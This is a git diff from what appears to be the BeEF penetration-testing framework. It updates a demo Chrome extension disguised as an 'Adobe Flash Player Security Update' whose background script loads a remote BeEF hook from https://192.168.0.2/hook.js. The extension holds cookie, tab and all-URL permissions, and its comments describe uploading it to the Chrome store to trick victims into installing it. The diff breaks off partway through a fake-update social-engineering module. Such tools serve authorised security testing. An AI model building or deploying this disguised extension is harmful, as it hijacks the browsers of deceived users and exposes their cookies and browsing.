diff --git a/extensions/demos/flash_update_chrome_extension/background.js b/extensions/demos/flash_update_chrome_extension/background.js
index aa364ae45..ff6c7b92a 100644
--- a/extensions/demos/flash_update_chrome_extension/background.js
+++ b/extensions/demos/flash_update_chrome_extension/background.js
@@ -6,5 +6,6 @@
d=document;
e=d.createElement('script');
-e.src="http://127.0.0.1:3000/hook.js";
-d.body.appendChild(e);
+e.src="https://192.168.0.2/hook.js";
+d.body.appendChild(e);
+
diff --git a/extensions/demos/flash_update_chrome_extension/manifest.json b/extensions/demos/flash_update_chrome_extension/manifest.json
index 7e2c4fa44..78b46fe06 100644
--- a/extensions/demos/flash_update_chrome_extension/manifest.json
+++ b/extensions/demos/flash_update_chrome_extension/manifest.json
@@ -1,26 +1,34 @@
{
- // Simple chrome extension
- // Just loads beef into the extension context.
- //
- // You may need to set the IP address of the beef hook in background.js
- // Then you can pack the extension (from within the chrome extensions page) and add the crx file to extensions/demos/html/
+ // Simple chrome extension, by antisnatchor and Mike Haworth
+ // Just loads BeEF into the extension context.
+ //
+ // 1. You need to set the IP address (better the domain) of the BeEF hook in background.js
+ // 2. The BeEF hook address must be == to the CSP allowed domain here below. BeEF must listen on port 443, with TLS enabled.
+ // Only localhost origin is allowed to load scripts from non HTTPS resources. For anything else, you must use HTTPS.
+ // 4. You need to upload the extension, as a zip file, to Google Chrome store.
+ // In latest versions of Chrome (>= 21) you can't install an extension from a different location anymore,
+ // so the extension can't be served by BeEF anymore. You need to trick the victim to install
+ // the extension from Google Chrome store.
+ //
- "name": "Adobe Flash Player",
- "version": "11.2.202.235",
- "description": "Introduces vulnerabilites into web browsers",
- "background": {
- "scripts": ["background.js"]
- },
- "icons": {
- "16": "icon16.png",
- "48": "icon48.png",
- "128": "icon128.png"
- },
- "permissions": [
- "tabs",
- "http://*/*",
- "https://*/*",
- "file://*/*",
- "cookies"
- ]
+ "name": "Adobe Flash Player Security Update",
+ "manifest_version": 2,
+ "version": "11.5.502.149",
+ "description": "Updates Adobe Flash Player with latest securty updates",
+ "background": {
+ "scripts": ["background.js"]
+ },
+ "content_security_policy": "script-src 'self' 'unsafe-eval' https://192.168.0.2; object-src 'self'",
+ "icons": {
+ "16": "icon16.png",
+ "48": "icon48.png",
+ "128": "icon128.png"
+ },
+ "permissions": [
+ "tabs",
+ "http://*/*",
+ "https://*/*",
+ "file://*/*",
+ "cookies"
+ ]
}
diff --git a/modules/social_engineering/fake_flash_update/config.yaml b/modules/social_engineering/fake_flash_update/config.yaml
index c62fcb60d..8922b69dc 100644
--- a/modules/social_engineering/fake_flash_update/config.yaml
+++ b/modules/social_engineering/fake_flash_update/config.yaml
@@ -9,7 +9,7 @@ beef:
enable: true
category: "Social Engineering"
name: "Fake Flash Update"
- description: "Prompts the user to install an update to Adobe Flash Player.
The file to be delivered could be a Chrome or Firefox extension.
A Chrome extension has privileged access and can do a whole lot..